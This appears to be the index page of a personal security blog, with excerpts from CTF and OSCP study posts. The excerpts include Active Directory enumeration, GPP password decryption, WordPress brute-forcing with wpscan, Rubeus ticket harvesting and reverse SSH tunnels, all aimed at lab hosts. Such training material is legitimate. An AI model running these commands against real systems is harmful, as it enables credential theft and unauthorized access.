Protected: CTF Challenge ideas
There is no excerpt because this is a protected post.
Active Directory Exploitation
Initial access SMB Enumeration smbmap -H 10.10.10.100 smbmap -H 10.10.10.100 -R # recursive smbmap -H 10.10.10.192 -u null smbmap -H 10.10.10.100 -d domain.local -u USERNAME -p PASSWORD smbclient \\\\10.10.10.169\\NETLOGON -U 'melanie'%'Welcome123!' If access on GPO Policies search for cpasswords in "domain.local/Policies/{xx-xx-xx}/MACHINE/Preferences/Groups/Groups.xml" and decrypt with gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ ASREPRoast Finding users that don't require preauth. We can... » read more
THM Internal
THM Internal This was an amazing challenge! I learned a few new tricks to thought about documenting it here real quick It all started with a WordPress site.... Easy bruteforce with wpscan wpscan --url http://10.10.40.183/wordpress/ -U wp_users.txt -P /usr/share/wordlists/rockyou.txt Lucky weeee. We got the admin password. First thing to do is insert a reverse shell... » read more
Exposing services with reverse SSH tunnels
Exposing services with reverse SSH tunnels Reverse SSH port forwarding specifies that the given port on the remote server host is to be forwarded to the given host and port on the local side. -L is a local tunnel (YOU <-- CLIENT). If a site was blocked, you can forward the traffic to a server... » read more
Windows-Exploitation
WIP... Here we go... A collection of commands for AD enumeration and exploitation for OSCP preparation. User Enumeration Enumerate users for domain CONTROLLER.local on DC CONTROLLER.local kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/User.txt Ticket harvesting and Passwort Bruteforcing Capture TGTs sent to the KDC every 30 seconds Rubeus.exe harvest /interval:30 User : CONTROLLER-1$@CONTROLLER.LOCAL StartTime :... » read more
Protected: HTB Red Failure
There is no excerpt because this is a protected post.
Connect to Windows Server using Linux
xfreerdp /v:hostname_or_ip_address /d:domain /u:username Also there is https://remmina.org/ Thanks for coming to my ted talk
Reverse engineer Android native apps with Frida and ADB
If you have an android native app with dynamic rendered content, reverse engineering can be tough. Thats why we can use Frida and ADB So what is Frida, exactly? User Guide It’s Greasemonkey for native apps, or, put in more technical terms, it’s a dynamic code instrumentation toolkit. It lets you inject snippets of JavaScript... » read more
Volatility dump startup items from registry
I came across a forensics CTF challenge where they mentioned something about a weird window popping up at startup. It was kinda clear that there must be a scheduled task. Here we go: vol.py -f file.raw --profile=Win7SP1x86_23418 printkey -K "Software\Microsoft\Windows\CurrentVersion\Run"
Protected: HTB AbuseHumanDB
There is no excerpt because this is a protected post.